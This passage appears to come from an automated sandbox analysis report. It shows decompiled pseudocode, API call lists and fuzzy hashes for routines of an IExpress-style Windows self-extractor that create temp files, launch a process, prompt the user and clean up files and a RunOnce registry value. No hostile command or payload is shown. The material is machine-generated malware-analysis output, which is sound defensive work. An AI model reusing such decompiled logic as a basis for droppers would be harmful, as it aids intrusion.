                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00026AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 00026AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 00026B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00026B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 00026BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 00026BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: a47dd271f5a74e9751732fae02410c059e6c32ddc745ab92564fd71e9d97a3c7
                                                                                                                                                                                                                                                • Instruction ID: d1f0b7178b659f573d501cdb27873e74d1b21aa8e19b8273aa7b2121eb6349ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47dd271f5a74e9751732fae02410c059e6c32ddc745ab92564fd71e9d97a3c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041E335A05334CFEB729B68F8457AE77E4BB44720F34801AE941E7291CF7A48828B81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000258C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 631 258c8-258d5 632 258d8-258dd 631->632 632->632 633 258df-258f1 LocalAlloc 632->633 634 258f3-25901 call 244b9 633->634 635 25919-25959 call 21680 call 2658a CreateFileA LocalFree 633->635 638 25906-25910 call 26285 634->638 635->638 645 2595b-2596c CloseHandle GetFileAttributesA 635->645 644 25912-25918 638->644 645->638 646 2596e-25970 645->646 646->638 647 25972-2597b 646->647 647->644
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000258C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00021680(_t20, _t36, _t33);
					E0002658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x29124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x29124 = E00026285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                                0x000258cd
                                                                                                                                                                                                                                                0x000258d1
                                                                                                                                                                                                                                                0x000258d3
                                                                                                                                                                                                                                                0x000258d5
                                                                                                                                                                                                                                                0x000258d8
                                                                                                                                                                                                                                                0x000258d8
                                                                                                                                                                                                                                                0x000258da
                                                                                                                                                                                                                                                0x000258db
                                                                                                                                                                                                                                                0x000258e1
                                                                                                                                                                                                                                                0x000258ed
                                                                                                                                                                                                                                                0x000258f1
                                                                                                                                                                                                                                                0x0002591e
                                                                                                                                                                                                                                                0x0002592c
                                                                                                                                                                                                                                                0x00025943
                                                                                                                                                                                                                                                0x0002594a
                                                                                                                                                                                                                                                0x0002594d
                                                                                                                                                                                                                                                0x00025953
                                                                                                                                                                                                                                                0x00025959
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002595b
                                                                                                                                                                                                                                                0x0002595c
                                                                                                                                                                                                                                                0x00025963
                                                                                                                                                                                                                                                0x0002596c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025972
                                                                                                                                                                                                                                                0x00025974
                                                                                                                                                                                                                                                0x0002597a
                                                                                                                                                                                                                                                0x0002597a
                                                                                                                                                                                                                                                0x0002596c
                                                                                                                                                                                                                                                0x000258f3
                                                                                                                                                                                                                                                0x00025901
                                                                                                                                                                                                                                                0x00025906
                                                                                                                                                                                                                                                0x0002590b
                                                                                                                                                                                                                                                0x00025910
                                                                                                                                                                                                                                                0x00025910
                                                                                                                                                                                                                                                0x00025918

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000258E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-2825630923
                                                                                                                                                                                                                                                • Opcode ID: 3001df2058558950bbd64b05271e52403736726ea681a0dde9f4bfd82de3fd34
                                                                                                                                                                                                                                                • Instruction ID: 37c778184615913ba48bf63df18677e4da27f1d8ccbb87836149736161325fc1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3001df2058558950bbd64b05271e52403736726ea681a0dde9f4bfd82de3fd34
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53112231B00630ABE7305F7ABC4DB9B7E9EDF86370F204615B50AD31C2CE78984686A4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00023FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 675 23fef-24010 676 24016-2403b CreateProcessA 675->676 677 2410a-2411a call 26ce0 675->677 678 24041-2406e WaitForSingleObject GetExitCodeProcess 676->678 679 240c4-24101 call 26285 GetLastError FormatMessageA call 244b9 676->679 681 24070-24077 678->681 682 24091 call 2411b 678->682 694 24106 679->694 681->682 685 24079-2407b 681->685 689 24096-240b8 CloseHandle * 2 682->689 685->682 688 2407d-24089 685->688 688->682 691 2408b 688->691 692 240ba-240c0 689->692 693 24108 689->693 691->682 692->693 695 240c2 692->695 693->677 694->693 695->694
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E00023FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x28004; // 0xf4950d3e
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00026CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x29124 = E00026285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E000244B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x28a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x29a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x29a2c = _t44;
						}
					}
				}
				E0002411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x29a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                                0x00023fef
                                                                                                                                                                                                                                                0x00023ffa
                                                                                                                                                                                                                                                0x00024001
                                                                                                                                                                                                                                                0x00024008
                                                                                                                                                                                                                                                0x0002400a
                                                                                                                                                                                                                                                0x0002400b
                                                                                                                                                                                                                                                0x00024010
                                                                                                                                                                                                                                                0x0002410a
                                                                                                                                                                                                                                                0x0002411a
                                                                                                                                                                                                                                                0x0002411a
                                                                                                                                                                                                                                                0x0002401c
                                                                                                                                                                                                                                                0x0002401d
                                                                                                                                                                                                                                                0x0002401e
                                                                                                                                                                                                                                                0x0002401f
                                                                                                                                                                                                                                                0x00024033
                                                                                                                                                                                                                                                0x0002403b
                                                                                                                                                                                                                                                0x000240ca
                                                                                                                                                                                                                                                0x000240e9
                                                                                                                                                                                                                                                0x000240f8
                                                                                                                                                                                                                                                0x00024101
                                                                                                                                                                                                                                                0x00024106
                                                                                                                                                                                                                                                0x00024106
                                                                                                                                                                                                                                                0x00024108
                                                                                                                                                                                                                                                0x00024108
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024108
                                                                                                                                                                                                                                                0x00024049
                                                                                                                                                                                                                                                0x0002405c
                                                                                                                                                                                                                                                0x00024062
                                                                                                                                                                                                                                                0x00024068
                                                                                                                                                                                                                                                0x0002406e
                                                                                                                                                                                                                                                0x00024070
                                                                                                                                                                                                                                                0x00024077
                                                                                                                                                                                                                                                0x0002407f
                                                                                                                                                                                                                                                0x00024089
                                                                                                                                                                                                                                                0x0002408b
                                                                                                                                                                                                                                                0x0002408b
                                                                                                                                                                                                                                                0x00024089
                                                                                                                                                                                                                                                0x00024077
                                                                                                                                                                                                                                                0x00024091
                                                                                                                                                                                                                                                0x0002409c
                                                                                                                                                                                                                                                0x000240a8
                                                                                                                                                                                                                                                0x000240b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000240c2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000240c2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00024033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00024049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 0002405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0002409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000240A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000240DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000240E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: f2a638529e96bad22ec9b7f22c51bc16a8db45a7b57f4bbd4cdb297d869858e2
                                                                                                                                                                                                                                                • Instruction ID: 8fd34b5bc40aefc4c6e5d5d5b62b81af55f4d25505650c0b58a8544d162aa92c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2a638529e96bad22ec9b7f22c51bc16a8db45a7b57f4bbd4cdb297d869858e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C31D631640228ABFB709F65EC89FAB77BCEB95710F204199F905D2161CA344CC6CB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000251E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000251E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0002468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0002468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E000244B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x29124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x29124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x29124 = 0x80070714;
					goto L10;
				}
				E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x29124 = E00026285();
				goto L10;
			}






                                                                                                                                                                                                                                                0x000251fb
                                                                                                                                                                                                                                                0x00025207
                                                                                                                                                                                                                                                0x0002520b
                                                                                                                                                                                                                                                0x0002523c
                                                                                                                                                                                                                                                0x00025268
                                                                                                                                                                                                                                                0x00025270
                                                                                                                                                                                                                                                0x0002528b
                                                                                                                                                                                                                                                0x00025293
                                                                                                                                                                                                                                                0x0002529c
                                                                                                                                                                                                                                                0x000252a6
                                                                                                                                                                                                                                                0x000252b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000252b0
                                                                                                                                                                                                                                                0x0002529e
                                                                                                                                                                                                                                                0x00025279
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002527b
                                                                                                                                                                                                                                                0x00025273
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025273
                                                                                                                                                                                                                                                0x0002524a
                                                                                                                                                                                                                                                0x00025250
                                                                                                                                                                                                                                                0x00025256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025256
                                                                                                                                                                                                                                                0x00025219
                                                                                                                                                                                                                                                0x00025223
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00022F4D,?,00000002,00000000), ref: 00025201
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00025250
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                • Opcode ID: 71a8e8e43150c51e93e042f02e02b0c36395b3cc1ea7d6fc51b1450c47493d93
                                                                                                                                                                                                                                                • Instruction ID: ab80928184097698b56d09ebb0c979419ba92a21477f9c77db7397712bb6eaa2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a8e8e43150c51e93e042f02e02b0c36395b3cc1ea7d6fc51b1450c47493d93
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6311E6B1700621EFE3346B717C8AB7B61DEEB8A345F204029BA06D61D1DA7D8C064129
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000252B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                			E000252B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x28004; // 0xf4950d3e
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x291e0; // 0x2a58e90
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x28a24 == 0 &&  *0x29a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x28a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x28a24 == 0 &&  *0x29a30 == 0) {
					_push(_t22);
					E00021781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x29a34 & 0x00000020) != 0) {
						E000265E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00022390( &_v268);
					_t11 =  *0x28a20; // 0x0
				}
				if( *0x29a40 != 1 && _t11 != 0) {
					_t11 = E00021FE1(_t22); // executed
				}
				 *0x28a20 =  *0x28a20 & 0x00000000;
				return E00026CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                                0x000252b6
                                                                                                                                                                                                                                                0x000252b6
                                                                                                                                                                                                                                                0x000252b6
                                                                                                                                                                                                                                                0x000252c1
                                                                                                                                                                                                                                                0x000252c8
                                                                                                                                                                                                                                                0x000252cb
                                                                                                                                                                                                                                                0x000252cc
                                                                                                                                                                                                                                                0x000252d4
                                                                                                                                                                                                                                                0x000252d6
                                                                                                                                                                                                                                                0x000252d7
                                                                                                                                                                                                                                                0x000252de
                                                                                                                                                                                                                                                0x000252e0
                                                                                                                                                                                                                                                0x000252f2
                                                                                                                                                                                                                                                0x000252fa
                                                                                                                                                                                                                                                0x000252fa
                                                                                                                                                                                                                                                0x00025302
                                                                                                                                                                                                                                                0x00025305
                                                                                                                                                                                                                                                0x0002530c
                                                                                                                                                                                                                                                0x00025312
                                                                                                                                                                                                                                                0x00025316
                                                                                                                                                                                                                                                0x00025316
                                                                                                                                                                                                                                                0x00025317
                                                                                                                                                                                                                                                0x0002531c
                                                                                                                                                                                                                                                0x0002531f
                                                                                                                                                                                                                                                0x00025333
                                                                                                                                                                                                                                                0x00025345
                                                                                                                                                                                                                                                0x00025351
                                                                                                                                                                                                                                                0x00025359
                                                                                                                                                                                                                                                0x00025359
                                                                                                                                                                                                                                                0x00025363
                                                                                                                                                                                                                                                0x00025369
                                                                                                                                                                                                                                                0x0002536f
                                                                                                                                                                                                                                                0x00025374
                                                                                                                                                                                                                                                0x00025374
                                                                                                                                                                                                                                                0x00025381
                                                                                                                                                                                                                                                0x00025387
                                                                                                                                                                                                                                                0x00025387
                                                                                                                                                                                                                                                0x0002538f
                                                                                                                                                                                                                                                0x000253a0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(02A58E90,00000080,?,00000000), ref: 000252F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(02A58E90), ref: 000252FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02A58E90,?,00000000), ref: 00025305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02A58E90), ref: 0002530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(000211FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00025363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00025334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-1116576409
                                                                                                                                                                                                                                                • Opcode ID: 77fadbbe4cc3d27e62a6e6d46c53b67ff56afcbbf9ec7fa8a40db33050e0ecbd
                                                                                                                                                                                                                                                • Instruction ID: f744df01d62c72bbdb231273c6a5f7d4d62cda509d2ec0a1b91be6df8c694c01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77fadbbe4cc3d27e62a6e6d46c53b67ff56afcbbf9ec7fa8a40db33050e0ecbd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53212331901624DFFB70DB10FC4ABA973F0BB04341F204159E882521A5CFB85E86CB89
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00021FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00021FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x28530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                                0x00021fee
                                                                                                                                                                                                                                                0x00022005
                                                                                                                                                                                                                                                0x0002200d
                                                                                                                                                                                                                                                0x00022017
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022020
                                                                                                                                                                                                                                                0x0002200d
                                                                                                                                                                                                                                                0x00022029

                                                                                                                                                                                                                                                APIs
